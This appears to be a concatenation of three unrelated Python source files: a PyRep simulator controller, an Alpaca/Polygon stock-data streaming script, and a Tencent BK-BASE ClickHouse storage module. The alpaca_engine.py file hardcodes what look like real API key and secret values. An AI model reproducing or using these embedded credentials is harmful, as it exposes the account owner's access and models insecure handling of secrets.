asynchronously step the UI of V-REP. Note, that will reduce
the responsiveness of the simulation thread.
:param blocking: Causes V-REP to launch as if running the default c++
client application. This is causes the function to block. For most
users, this will be set to False.
"""
if len(scene_file) > 0 and not os.path.isfile(
os.path.abspath(scene_file)):
raise PyRepError('Scene file does not exist: %s' % scene_file)
cwd = os.getcwd()
self._ui_thread = threading.Thread(target=self._run_ui_thread,
args=(scene_file, headless))
self._ui_thread.daemon = True
self._ui_thread.start()
while not vrep.simExtCanInitSimThread():
time.sleep(0.1)
vrep.simExtSimThreadInit()
time.sleep(0.2) # Stops V-REP crashing if it is restarted too quickly.
if blocking:
while not vrep.simExtGetExitRequest():
vrep.simExtStep()
self.shutdown()
elif responsive_ui:
self._responsive_ui_thread = threading.Thread(
target=self._run_responsive_ui_thread)
self._responsive_ui_thread.daemon = True
try:
self._responsive_ui_thread.start()
except (KeyboardInterrupt, SystemExit):
if not self._shutting_down:
self.shutdown()
sys.exit()
self.step()
else:
self.step()
os.chdir(cwd) # Go back to the previous cwd
def script_call(self, function_name_at_script_name: str,
script_handle_or_type: int,
ints=(), floats=(), strings=(), bytes='') -> (
Tuple[List[int], List[float], List[str], str]):
"""Calls a script function (from a plugin, the main client application,
or from another script). This represents a callback inside of a script.
:param function_name_at_script_name: A string representing the function
name and script name, e.g. myFunctionName@theScriptName. When the
script is not associated with an object, then just specify the
function name.
:param script_handle_or_type: The handle of the script, otherwise the
type of the script.
:param ints: The input ints to the script.
:param floats: The input floats to the script.
:param strings: The input strings to the script.
:param bytes: The input bytes to the script (as a string).
:return: Any number of return values from the called Lua function.
"""
return utils.script_call(
function_name_at_script_name, script_handle_or_type, ints, floats,
strings, bytes)
def shutdown(self) -> None:
"""Shuts down the V-REP simulation.
"""
if self._ui_thread is None:
raise PyRepError('V-REP has not been launched. Call launch first.')
if self._ui_thread is not None:
self._shutting_down = True
self.stop()
self.step_ui()
vrep.simExtPostExitRequest()
vrep.simExtSimThreadDestroy()
self._ui_thread.join()
if self._responsive_ui_thread is not None:
self._responsive_ui_thread.join()
# V-REP crashes if new instance opened too quickly after shutdown.
# TODO: A small sleep stops this for now.
time.sleep(0.1)
self._ui_thread = None
self._shutting_down = False
def start(self) -> None:
"""Starts the physics simulation if it is not already running.
"""
if self._ui_thread is None:
raise PyRepError('V-REP has not been launched. Call launch first.')
if not self.running:
vrep.simStartSimulation()
self.running = True
def stop(self) -> None:
"""Stops the physics simulation if it is running.
"""
if self._ui_thread is None:
raise PyRepError('V-REP has not been launched. Call launch first.')
if self.running:
vrep.simStopSimulation()
self.running = False
# Need this so the UI updates
[self.step() for _ in range(5)]
def step(self) -> None:
"""Execute the next simulation step.
If the physics simulation is not running, then this will only update
the UI.
"""
with self._step_lock:
vrep.simExtStep()
def step_ui(self) -> None:
"""Update the UI.
This will not execute the next simulation step, even if the physics
simulation is running.
This is only applicable when PyRep was launched without a responsive UI.
"""
with self._step_lock:
vrep.simExtStep(False)
def set_simulation_timestep(self, dt: float) -> None:
"""Sets the simulation time step. Default is 0.05.
:param dt: The time step value in seconds.
"""
vrep.simSetFloatParameter(vrep.sim_floatparam_simulation_time_step, dt)
def set_configuration_tree(self, config_tree: bytes) -> None:
"""Restores configuration information previously retrieved.
Configuration information (object relative positions/orientations,
joint/path values) can be retrieved with
:py:meth:`Object.get_configuration_tree`. Dynamically simulated
objects will implicitly be reset before the command is applied
(i.e. similar to calling :py:meth:`Object.reset_dynamic_object` just
before).
:param config_tree: The configuration tree to restore.
"""
vrep.simSetConfigurationTree(config_tree)
def group_objects(self, objects: List[Shape]) -> Shape:
"""Groups several shapes into a compound shape (or simple shape).
:param objects: The list of shapes to group.
:return: A single grouped shape.
"""
handles = [o.get_handle() for o in objects]
handle = vrep.simGroupShapes(handles)
return Shape(handle)
def merge_objects(self, objects: List[Shape]) -> Shape:
"""Merges several shapes into a compound shape (or simple shape).
:param objects: The list of shapes to group.
:return: A single merged shape.
"""
handles = [o.get_handle() for o in objects]
handle = vrep.simGroupShapes(handles, merge=True)
return Shape(handle)
def import_model(self, filename: str) -> Object:
""" Loads a previously saved model.
:param filename: model filename. The filename extension is required
("ttm"). An optional "@copy" can be appended to the filename, in
which case the model's objects will be named/renamed as if an
associated script was attached to the model.
:return: The imported model.
"""
handle = vrep.simLoadModel(filename)
return utils.to_type(handle)
def create_texture(self, filename: str, interpolate=True, decal_mode=False,
repeat_along_u=False, repeat_along_v=False
) -> Tuple[Shape, Texture]:
"""Creates a planar shape that is textured.
:param filename: Path to the texture to load.
:param interpolate: Adjacent texture pixels are not interpolated.
:param decal_mode: Texture is applied as a decal (its appearance
won't be influenced by light conditions).
:param repeat_along_u: Texture will be repeated along the U direction.
:param repeat_along_v: Texture will be repeated along the V direction.
:return: A tuple containing the textured plane and the texture.
"""
options = 0
if not interpolate:
options |= 1
if decal_mode:
options |= 2
if repeat_along_u:
options |= 3
if repeat_along_v:
options |= 4
handle = vrep.simCreateTexture(filename, options)
s = Shape(handle)
return s, s.get_texture()
|
alpaca_engine.py | import asyncio
from datetime import datetime
import json
import pprint
import threading
import queue
import os
import sys
import alpaca_trade_api as tradeapi
from alpaca_trade_api.polygon.entity import (
Quote, Trade, Agg, Entity,
)
from alpaca_trade_api.polygon.stream2 import StreamConn as PolygonStreamConn
from alpaca_trade_api.stream2 import StreamConn
from alpha_tech_tracker.redis_client import redis_client
import ipdb
import pandas as pd
from pandas import Timestamp
key_id = os.environ.get('ALPACA_KEY_ID')
secret_key = os.environ.get('ALPACA_SECRET_KEY')
api = tradeapi.REST(key_id, secret_key)
# curl "https://api.polygon.io/v1/historic/quotes/SPY/2018-06-01?apiKey=$APCA_API_KEY_ID"
def now():
now = datetime.now()
def test_api():
# polygon/REST.historic_agg(size, symbol, _from=None, to=None, limit=None)
# https://api.polygon.io/v2/aggs/ticker/AAPL/range/5/minute/2019-01-01/2019-02-01?apiKey=PKX2ZYMDG183VHH2VPYS
df = api.polygon.historic_agg('minute', 'AMZN', limit=100).df
ipdb.set_trace()
# historic_agg_v2(self, symbol, multiplier, timespan, _from, to, unadjusted=False, limit=None)
amzn_df = api.polygon.historic_agg_v2('AMZN', 5, 'minute', '2019-07-23', '2019-07-24').df
# historic_trades(self, symbol, date, offset=None, limit=None):
trades = api.polygon.historic_trades('AMZN', '2019-07-24')
# snapshot data
snapshot = api.polygon.snapshot('CMG')
with pd.option_context('display.max_rows', None, 'display.max_columns', None): # more options can be specified also
print(amzn_df)
def ts():
return pd.Timestamp.now()
def debug(*args, **kwargs):
print(ts(), " ", *args, file=sys.stderr, **kwargs)
async def on_data(conn, channel, data):
# if opt.debug or not (channel in ('AM', 'Q', 'A', 'T')):
debug("debug: ", pprint.pformat(data))
def test_stream():
conn = StreamConn(key_id=key_id, secret_key=secret_key)
# conn = PolygonStreamConn(key_id=key_id)
# conn.register(r'.*', on_data)
on_data1 = conn.on(r'.*')(on_data)
# conn.run(['AM.*','XQ.*'])
# conn.run(['Q.*', 'T.*', 'AM.AMZN', 'A.*'])
# conn.run(['Q.AMZN'])
conn.run(['AM.GOOGL'])
# sample output
# Entity({'ev': 'status', 'message': 'subscribed to: A.*', 'status': 'success'})
# [{"ev":"T","sym":"MSFT","p":114.178,"x":"5","s":270,"t":1564101092822, .... }]
# aggregate minutes data into 5 mins in Redis and then save to csv
# construct real time 5 mins trade data for technical analysis signals
# integrate with moving average and 7 days historical data to find resistant and support levels
def get_historical_ochl_data(symbol, interval=5, start_date=str(now), end_date=str(now)):
return api.polygon.historic_agg_v2(symbol, interval, 'minute', start_date, end_date).df
def save_ticker_min_agg_to_redis(agg_data):
selected_agg_attributes = ['open', 'high', 'low', 'close', 'volume', 'start' , 'end']
selected_agg_data = {k: v for k, v in agg_data._raw.items() if k in selected_agg_attributes}
# selected_agg_data['start'] = datetime.utcfromtimestamp(selected_agg_data['start'] / 1000)
# selected_agg_data['end'] = datetime.utcfromtimestamp(selected_agg_data['end'] / 1000)
cache_key = agg_data.symbol.lower() + "_" + str(selected_agg_data['end'])
redis_client.set_object(cache_key, selected_agg_data)
def save_ticker_min_agg_to_json(agg_data):
#
# save df to json df.to_json(file_path, orient='records')
# pd.read_json('amzn_5min_sample.json', orient='records')
selected_agg_attributes = ['open', 'high', 'low', 'close', 'volume', 'start' , 'end']
selected_agg_data = {k: v for k, v in agg_data._raw.items() if k in selected_agg_attributes}
data_dir = './market_data'
# file_name = agg_data.symbol.lower() + "_" + str(selected_agg_data['end'])
file_name = agg_data.symbol.lower() + "_min_aggs"
file_path = '{}/{}'.format(data_dir, file_name)
f = open(file_path, "a+")
f.write(json.dumps(selected_agg_data))
f.write("\n")
f.close
def simulate_stream_minute_aggreated_market_data_from_file(file_path, symbol, limit=500):
for line in open(file_path).readlines()[limit * -1:]:
data = json.loads(line)
data['symbol'] = symbol
agg_data = Agg(data)
promise = DataAggregator.handle_streaming_minute_agg_data({}, {}, agg_data)
asyncio.async(promise)
class DataAggregator(object):
key_id = 'PKX2ZYMDG183VHH2VPYS'
secret_key = 'HM6fKUfOVohXWj5JG1bD57hM6LE0xM5NaX9aoUCT'
generator_queues = []
def __init__(self):
self.raw_data_df = pd.DataFrame([], columns = ['open', 'high',
'low', 'close', 'volume', ])
self.aggregated_df = pd.DataFrame([], columns = ['open', 'high',
'low', 'close', 'volume', ])
self.handlers = {}
self.selected_agg_attributes = ['open', 'high', 'low', 'close', 'volume', 'start' , 'end']
def add(self, data):
selected_data = {k: v for k, v in data._raw.items() if k in self.selected_agg_attributes}
new_series = pd.Series(selected_data)
new_series.name = Timestamp(new_series['end'], unit='ms', tz='America/New_York')
self.raw_data_df = self.raw_data_df.append(new_series)
latest_timestamp = self.raw_data_df.iloc[-1].name
if len(self.raw_data_df) >= 5 and latest_timestamp.minute % 5 == 0:
self.aggregate_to_5_minutes()
five_mins_handlers = self.handlers.get('5min')
if five_mins_handlers:
for handler in five_mins_handlers:
handler(self.aggregated_df.iloc[-1].copy())
def aggregate_to_5_minutes(self):
interval = 5
aggregated_seires = pd.Series({
'open': self.raw_data_df.iloc[-interval]['open'],
'close': self.raw_data_df.iloc[-1]['close'],
'low': min(self.raw_data_df[-interval:]['low']),
'high': max(self.raw_data_df[-interval:]['high']),
'volume': sum(self.raw_data_df[-interval:]['volume'])
})
aggregated_seires.name = self.raw_data_df.iloc[-5].name
self.aggregated_df = self.aggregated_df.append(aggregated_seires)
def register(self, interval, fn):
if interval not in ['5min']:
raise ValueError("interval needs to be: ['5min']")
if interval in self.handlers:
self.handlers[interval].append(fn)
else:
self.handlers[interval] = [fn]
@classmethod
def fetch_5_mins_aggregated_data(cls, timeout=300, symbol=None):
"""
timeout: default to 5 minutes second, if there is no more data in the next 5 mins,
it will raise queue.Empty error
:return: a generator that waits for the next 5 mins aggregate market data
"""
if not symbol:
raise ValueError("Symbol can not be None")
new_agg_data_queue = queue.Queue()
aggregator = DataAggregator()
aggregator.register('5min', lambda data: new_agg_data_queue.put(data))
async def on_data_2(conn, channel, data):
# if opt.debug or not (channel in ('AM', 'Q', 'A', 'T')):
debug("debug: ", pprint.pformat(data))
if isinstance(data, Agg):
save_ticker_min_agg_to_json(data)
aggregator.add(data)
# ipdb.set_trace()
conn = StreamConn(key_id=cls.key_id, secret_key=cls.secret_key)
on_data1 = conn.on(r'.*')(on_data_2)
# conn.run(['Q.*', 'T.*', 'AM.AMZN', 'A.*'])
# conn.run(['AM.AMZN'])
# ipdb.set_trace()
subscribe_channels = ['AM.{}'.format(symbol)]
stream_thread = threading.Thread(target=conn.run, args=([subscribe_channels]))
stream_thread.start()
# conn.run(['AM.AMZN'])
# data = {
# 'average': 1937.4642,
# 'close': 1940.09,
# 'dailyopen': 1942,
# 'end': 1564170660000,
# 'high': 1940.651,
# 'low': 1939.665,
# 'open': 1940.16,
# 'start': 1564170600000,
# 'symbol': 'AMZN',
# 'totalvolume': 4430955,
# 'volume': 10000,
# 'vwap': 1940.116
# }
# for i in range(7):
# agg_data = Agg(data)
# aggregator.add(agg_data)
# data['start'] += 60000
# data['end'] += 60000
# data['close'] += 1
# data['open'] -= 1
# data['high'] += 2
# data['low'] -= 1
while True:
try:
print('waiting on data')
data = new_agg_data_queue.get(timeout=timeout)
time_index = data.name
yield((time_index, data))
except queue.Empty:
print('Timeout on waiting new data')
break
conn.loop.call_soon_threadsafe(conn.loop.stop)
print('Request to stop Event Loop')
stream_thread.join()
print('Waiting for market data stream thread to join')
@classmethod
def start_streaming_market_data(cls, timeout=300, symbols=[]):
if not symbols:
raise ValueError("Symbols can not be empty")
cls.aggregators_by_symbol = {}
cls.stop_streaming_thread = False
for symbol in symbols:
cls.aggregators_by_symbol[symbol] = DataAggregator()
async def handle_streaming_minute_agg_data(conn, channel, data):
debug("debug: ", pprint.pformat(data))
if isinstance(data, Agg):
# save_ticker_min_agg_to_json(data)
aggregator = cls.aggregators_by_symbol.get(data.symbol)
if aggregator:
aggregator.add(data)
else:
debug('No aggregator for symbol {}'.format(data.symbol))
stream_connection = StreamConn(key_id=cls.key_id, secret_key=cls.secret_key)
stream_connection.on(r'.*')(handle_streaming_minute_agg_data)
subscribe_channels = ['AM.{}'.format(symbol) for symbol in symbols]
stream_thread = threading.Thread(
target=stream_connection.run,
args=([subscribe_channels]
))
cls.stream_thread = stream_thread
cls.stream_connection = stream_connection
cls.stream_thread.start()
cls.handle_streaming_minute_agg_data = handle_streaming_minute_agg_data
@classmethod
def stop_streaming_market_data(cls):
cls.stop_streaming_thread = True
cls.stream_connection.loop.call_soon_threadsafe(cls.stream_connection.loop.stop)
print('Request to stop Event Loop')
cls.stream_thread.join()
for g_queue in cls.generator_queues:
g_queue.put(None)
@classmethod
def build_mins_aggregated_data_generator(cls, symbol, timeout=300):
agg_interval = '5min'
new_agg_data_queue = queue.Queue()
cls.generator_queues.append(new_agg_data_queue)
aggregator = cls.aggregators_by_symbol[symbol]
aggregator.register(agg_interval, lambda data: new_agg_data_queue.put(data))
while True:
print('waiting on data')
try:
data = new_agg_data_queue.get(timeout=timeout)
if data is not None:
time_index = data.name
yield((time_index, data))
else:
print('market data generator stoped')
break
except queue.Empty:
print("Timeout getting data")
break
|
clickhouse.py | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import contextlib
import json
import threading
import time
import traceback
import kazoo.client
import kazoo.retry
from clickhouse_driver import Client
from common.log import logger
from datahub.common.const import (
APPEND_FIELDS,
AVERAGE,
BAD_FIELDS,
CAPACITY,
CHECK_DIFF,
CHECK_RESULT,
CK_DEFAULT_CONNECT_TIMEOUT_SEC,
CK_DEFAULT_SYNC_REQUEST_TIMEOUT_SEC,
CLICKHOUSE,
CLICKHOUSE_FIELDS,
CLUSTER_NAME,
CONNECTION_INFO,
CONSISTENCY,
COUNT,
DEFAULT,
DELETE_FIELDS,
DISTINCT_PARTITIONS,
DISTRIBUTED_TABLE,
ELAPSED,
EMPTY_STRING,
ENABLE,
EXCEPTION,
EXPIRES,
EXPRESSION,
FACTOR,
FIELD_NAME,
FIELD_TYPE,
FIELDS,
FREE_DISK,
GRANULARITY,
HOSTS,
HTTP_PORT,
INDEX_TYPE,
INFO,
INNER_CLUSTER,
IP,
MAX,
MESSAGE,
MIN,
NAME,
NODES,
ORDER_BY,
PARTITION_TIME,
PARTITIONS,
PHYSICAL_TABLE_NAME,
PROCESSING_TYPE,
QUERY,
QUERY_ID,
QUERYSET,
REPLICATED_TABLE,
REPORT_TIME,
RESULT_TABLE_ID,
RT_FIELDS,
SAMPLE,
SCHEMAS,
SIZE,
SNAPSHOT,
STORAGE_CLUSTER,
STORAGE_CONFIG,
STORAGE_USAGE,
STORAGES,
SUM,
TABLE,
TABLE_RECORD_NUMS,
TABLE_SIZE_MB,
TCP_TGW,
TIMESTAMP,
TOP_PARTITIONS,
TOTAL_PARTITIONS,
TOTAL_SPACE,
TOTAL_SUM,
TOTAL_USAGE,
TYPE,
USED_MAX,
USED_MIN,
USED_SPACE,
USED_SUM,
WEIGHTS,
ZK_ADDRESS,
)
from datahub.storekit import model_manager, util
from datahub.storekit.exceptions import (
ClickHouseAddIndexException,
ClickHouseConfigException,
ClickHouseDropIndexException,
ClickHousePrepareException,
ClickHouseStorageConfigException,
)
from datahub.storekit.settings import (
ADD_COLUMN_SQL,
ALTER_INDEX_SQL,
ALTER_TABLE_SQL,
ALTER_TTL_SQL,
CHECK_TABLE_EXIST_SQL,
CK_NODE_ZK_PATH_FORMAT,
CK_TB_ZK_PATH_FORMAT,
CLICKHOUSE_MAINTAIN_TIMEOUT,
CREATE_DB_SQL,
CREATE_DISTRIBUTED_TABLE_SQL,
CREATE_REPLICATED_TABLE_SQL,
DROP_COLUMN_SQL,
DROP_INDEX_SQL,
DROP_TABLE_SQL,
ENGINE_FULL_SQL,
FORMAT_READABLE_SQL,
FUSING_THRESHOLD,
ORDER_BY_SQL,
PARTITION_BY_SQL,
QUERY_ALL_CAPACITY_SQL,
QUERY_CAPACITY_BYTES_SQL,
QUERY_CAPACITY_SQL,
QUERY_CLUSTER_CAPACITY_SQL,
QUERY_CLUSTER_SQL,
QUERY_CLUSTER_TOP_PARTITIONS_SQL,
QUERY_COUNT_SQL,
QUERY_DISTINCT_PARTITIONS_SQL,
QUERY_FIELDS_SQL,
QUERY_PROCESSLIST_SQL,
QUERY_SAMPLE_SQL,
QUERY_TOP_PARTITIONS_SQL,
QUERY_TOTAL_PARTITIONS_SQL,
RT_TYPE_TO_CLICKHOUSE_MAPPING,
RTX_RECEIVER,
SAMPLE_BY_SQL,
SHOW_SCHEMA_SQL,
TRUNCATE_TABLE_SQL,
TTL_BY_SQL,
ClICKHOUSE_DEFAULT_COLUMNS,
ClICKHOUSE_EXCEPT_FIELDS,
)
from datahub.storekit.util import translate_expires_day
def initialize(rt_info):
"""
初始化rt的clickhouse存储
:param rt_info: rt的字段和配置信息
:return: 初始化操作结果
"""
return prepare(rt_info)
def common_initial(rt_info):
"""
:param rt_info: rt基础信息
:return: client clickhouse客户端
db_name 库名
distributed_table 分布式表名
replicated_table 复制表名
inner_cluster clickhouse集群内部虚拟集群名
"""
ck = rt_info[STORAGES][CLICKHOUSE]
conn = json.loads(ck[STORAGE_CLUSTER][CONNECTION_INFO])
host, port = conn[TCP_TGW].split(":")[0], int(conn[TCP_TGW].split(":")[1])
client = build_client(host, port)
physical_tn = ck[PHYSICAL_TABLE_NAME]
db_name, distributed_table = physical_tn.split(".")[0], physical_tn.split(".")[1]
replicated_table = f"{distributed_table}_local"
inner_cluster = conn[INNER_CLUSTER]
return client, db_name, distributed_table, replicated_table, inner_cluster
def build_client(
host,
port,
database=DEFAULT,
user=DEFAULT,
connect_timeout=CK_DEFAULT_CONNECT_TIMEOUT_SEC,
sync_request_timeout=CK_DEFAULT_SYNC_REQUEST_TIMEOUT_SEC,
):
"""
:param host: 主机名或者ip
:param port: ck server 端口
:param database: 库名
:param user: 用户名
:param connect_timeout: 连接超时
:param sync_request_timeout: ping请求超时
:return:
"""
return Client(
host=host,
port=port,
database=database,
user=user,
connect_timeout=connect_timeout,
sync_request_timeout=sync_request_timeout,
)
def info(rt_info):
"""
获取rt的clickhouse存储相关信息:表结构,字段,样例数据,各节点分区信息,数据量信息和表一致性检查
:param rt_info: rt的字段和配置信息
:return: rt的clickhouse相关信息
"""
client, db_name, distributed_table, replicated_table, _ = common_initial(rt_info)
result = {}
try:
# 查看复制表结构
sql = SHOW_SCHEMA_SQL.format(db_name, replicated_table)
result[REPLICATED_TABLE] = get_table_schema(client, sql)
# 表字段信息
sql = QUERY_FIELDS_SQL.format(db_name, replicated_table)
result[FIELDS] = [f"{cell[0]}:{cell[1]}" for cell in client.execute(sql)]
# 查看分布式表结构
sql = SHOW_SCHEMA_SQL.format(db_name, distributed_table)
result[DISTRIBUTED_TABLE] = get_table_schema(client, sql)
# 采样数据
sql = QUERY_SAMPLE_SQL.format(db_name, distributed_table)
result[SAMPLE] = client.execute(sql)
# 行数和空间占用大小
sql = QUERY_COUNT_SQL.format(db_name, distributed_table)
result[COUNT] = client.execute(sql)[0][0]
# 采集表数据量
result[SIZE] = table_capacity(client, db_name, replicated_table)
# 采集分区数
result[PARTITIONS] = table_partitions(client, db_name, replicated_table)
# 节点间表结构一致性检查
result[CONSISTENCY] = check_table_consistency(client, db_name, distributed_table, replicated_table)
except Exception as e:
logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to get info", exc_info=True)
result[EXCEPTION] = str(e)
finally:
client.disconnect()
ck = rt_info[STORAGES][CLICKHOUSE]
ck[INFO] = result
return ck
def get_table_schema(client, sql):
"""
:param client: clickhouse客户端
:param sql: 查表结构的sql
:return: 表结构字符串
"""
return client.execute(sql)[0][0].replace("\n", " ")
def get_all_table_capacity(conn):
"""
读取clickhouse集群中全部local后缀表的数据量信息
:param conn: 集群链接信息
:return:
"""
host, port = conn[TCP_TGW].split(":")[0], int(conn[TCP_TGW].split(":")[1])
client = build_client(host, port)
try:
resultSet = client.execute(QUERY_CLUSTER_SQL)
rt_size = {}
for re in resultSet:
host, port = re[0], int(re[1])
inner_client = build_client(host, port)
try:
size_info = inner_client.execute(QUERY_ALL_CAPACITY_SQL)
for info in size_info:
db, table, total_bytes, total_rows = info[0], info[1], int(info[2]), int(info[3])
physical_tn = f"{db}.{table}"
if physical_tn in rt_size:
rt_size[physical_tn][TABLE_SIZE_MB] += total_bytes / 1024 / 1024
rt_size[physical_tn][TABLE_RECORD_NUMS] += total_rows / 2
else:
rt_size[physical_tn] = {
TABLE_SIZE_MB: total_bytes / 1024 / 1024,
TABLE_RECORD_NUMS: total_rows / 2,
REPORT_TIME: time.time(),
}
finally:
inner_client.disconnect()
return rt_size
finally:
client.disconnect()
def table_capacity(client, db_name, replicated_table):
"""
采集表数据量
:param replicated_table: 本地复制表
:param client: clickhouse客户端
:param db_name: 库名
:return: 指定表在各个server上的数据量信息
"""
capacity = {}
capacity_bytes = []
resultSet = client.execute(QUERY_CLUSTER_SQL)
for re in resultSet:
host, port = re[0], int(re[1])
inner_client = build_client(host, port)
try:
sql = QUERY_CAPACITY_SQL.format(db_name, replicated_table)
instance = f"{host}:{port}"
capacity[instance] = inner_client.execute(sql)[0][0]
sql = QUERY_CAPACITY_BYTES_SQL.format(db_name, replicated_table)
capacity_bytes.append(float(inner_client.execute(sql)[0][0]))
finally:
inner_client.disconnect()
size = len(capacity_bytes)
capacity_max, capacity_min, capacity_sum, capacity_average = 0, 0, 0, 0
if size > 0:
capacity_max = format_readable_size(client, max(capacity_bytes))
capacity_min = format_readable_size(client, min(capacity_bytes))
capacity_sum = format_readable_size(client, sum(capacity_bytes))
capacity_average = format_readable_size(client, sum(capacity_bytes) / size)
return {CAPACITY: capacity, MAX: capacity_max, MIN: capacity_min, SUM: capacity_sum, AVERAGE: capacity_average}
def format_readable_size(client, size):
"""
字节转可读格式的容量大小
:param client: clickhouse客户端
:param size: 字节大小
:return: 可读形式的容量大小
"""
sql = FORMAT_READABLE_SQL.format(size)
return client.execute(sql)[0][0]
def cluster_processlist(cluster_name):
"""
在各个节点上取前十个正在执行且耗时最最长的查询
:param cluster_name: clickhouse集群名
:return: 正在运行的sql
"""
client = cluster_common_initial(cluster_name)
processlist = {}
try:
resultSet = client.execute(QUERY_CLUSTER_SQL)
for re in resultSet:
host, port = re[0], int(re[1])
inner_client = build_client(host, port)
try:
instance = f"{host}:{port}"
processlist[instance] = get_processlist(inner_client)
finally:
inner_client.disconnect()
finally:
client.disconnect()
return processlist
def top_partitions(cluster_name):
"""
在各个节点上取前十个parts最多的分区
:param cluster_name: clickhouse集群名
:return: 分区信息
"""
client = cluster_common_initial(cluster_name)
top_partitions = {}
try:
resultSet = client.execute(QUERY_CLUSTER_SQL)
for result in resultSet:
host, port = result[0], int(result[1])
inner_client = build_client(host, port)
try:
reSet = inner_client.execute(QUERY_CLUSTER_TOP_PARTITIONS_SQL)
top_parts = [f"{r[0]} {r[1]} {r[2]}.{r[3]}" for r in reSet]
instance = f"{host}:{port}"
top_partitions[instance] = top_parts
finally:
inner_client.disconnect()
finally:
client.disconnect()
return top_partitions
def get_processlist(client):
"""
show processlist
:param client: clickhouse客户端
:return: 取节点上前十个正在执行且耗时最最长的查询
"""
result = []
query_results = client.execute(QUERY_PROCESSLIST_SQL)
for re in query_results:
process = {QUERY_ID: re[0], QUERY: re[1], ELAPSED: re[2]}
result.append(process)
return result
def cluster_capacity(cluster_name):
"""
采集集群容量
:param cluster_name: 集群名称
:return: 容量信息
"""
capacity = {}
capacity_usage = []
capacity_used = []
capacity_total = []
client = cluster_common_initial(cluster_name)
try:
resultSet = client.execute(QUERY_CLUSTER_SQL)
for re in resultSet:
host, port = re[0], int(re[1])
inner_client = build_client(host, port)
try:
result = inner_client.execute(QUERY_CLUSTER_CAPACITY_SQL)
free_space, total_space = int(result[0][0]), int(result[0][1])
used_space = total_space - free_space
storage_usage = 100 * used_space / total_space
capacity_used.append(used_space)
capacity_total.append(total_space)
capacity_usage.append(storage_usage)
instance = f"{host}:{port}"
capacity[instance] = {
USED_SPACE: format_readable_size(inner_client, used_space),
TOTAL_SPACE: format_readable_size(inner_client, total_space),
STORAGE_USAGE: storage_usage,
}
finally:
inner_client.disconnect()
size = len(capacity_total)
used_sum, usage_max, usage_min, total_usage, total_sum = 0, 0, 0, 0, 0
if size > 0:
usage_max, usage_min = max(capacity_usage), min(capacity_usage)
used_sum = sum(capacity_used)
total_sum = sum(capacity_total)
total_usage = 100 * sum(capacity_used) / sum(capacity_total)
return {
CAPACITY: capacity,
USED_MAX: usage_max,
USED_MIN: usage_min,
USED_SUM: used_sum,
TOTAL_SUM: total_sum,
TOTAL_USAGE: total_usage,
TIMESTAMP: time.time(),
}
finally:
client.disconnect()
def cluster_common_initial(cluster_name):
"""
生成client客户端
:param cluster_name: 集群名称
:return: client客户端
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, CLICKHOUSE)
conn = json.loads(cluster.connection_info)
host, port = conn[TCP_TGW].split(":")[0], int(conn[TCP_TGW].split(":")[1])
return build_client(host, port)
def table_partitions(client, db_name, replicated_table):
"""
采集表数据量
:param replicated_table: 本地复制表
:param client: clickhouse客户端
:param db_name: 库名
:return: 指定表在各个server上的分区状态
"""
partitions = {}
resultSet = client.execute(QUERY_CLUSTER_SQL)
for result in resultSet:
part = {}
host, port = result[0], int(result[1])
inner_client = build_client(host, port)
try:
sql = QUERY_DISTINCT_PARTITIONS_SQL.format(db_name, replicated_table)
part[DISTINCT_PARTITIONS] = inner_client.execute(sql)[0][0]
sql = QUERY_TOTAL_PARTITIONS_SQL.format(db_name, replicated_table)
part[TOTAL_PARTITIONS] = inner_client.execute(sql)[0][0]
sql = QUERY_TOP_PARTITIONS_SQL.format(db_name, replicated_table)
part[TOP_PARTITIONS] = [f"{r[0]} {r[1]} {r[2]}.{r[3]}" for r in inner_client.execute(sql)]
partitions[f"{host}:{port}"] = part
finally:
inner_client.disconnect()
return partitions
def alter_table(rt_info):
"""
修改rt的clickhouse存储相关信息: 表结构变更add/drop column,TTL修改
:param rt_info: rt的字段和配置信息
:return: rt的clickhouse存储的变更结果
"""
client, db_name, distributed_table, replicated_table, inner_cluster = common_initial(rt_info)
try:
# alter table fields
field_diff = check_schema(rt_info)
append_fields, delete_fields = field_diff[CHECK_DIFF][APPEND_FIELDS], field_diff[CHECK_DIFF][DELETE_FIELDS]
if append_fields or delete_fields:
alter_fields(
client, db_name, distributed_table, replicated_table, inner_cluster, append_fields, delete_fields
)
# alter table ttl
set_expire(
client,
db_name,
replicated_table,
inner_cluster,
rt_info[PROCESSING_TYPE],
rt_info[STORAGES][CLICKHOUSE][EXPIRES],
)
check_tables(client, db_name, distributed_table, replicated_table)
except Exception as e:
logger.error(f"{rt_info[RESULT_TABLE_ID]}: failed to create table", exc_info=True)
raise e
finally:
client.disconnect()
def set_expire(client, db_name, replicated_table, inner_cluster, processing_type, expire):
"""
设置table ttl规则
:param replicated_table: 本地复制表
:param client: clickhouse客户端
:param db_name: 库名
:param inner_cluster: ck集群的内部逻辑集群
:param processing_type: rt的processing_type类型
:param expire: 表数据保存周期
"""
if processing_type in [QUERYSET, SNAPSHOT]:
return
expire_days = translate_expires_day(expire)
if expire_days <= 0:
return
ttl_by = TTL_BY_SQL.format(expire_days)
sql = ENGINE_FULL_SQL.format(db_name, replicated_table)
engine_full = get_table_schema(client, sql)
if ttl_by not in engine_full:
sql = ALTER_TTL_SQL.format(db_name, replicated_table, inner_cluster, expire_days)
client.execute(sql)
def check_tables(client, db_name, distributed_table, replicated_table):
"""
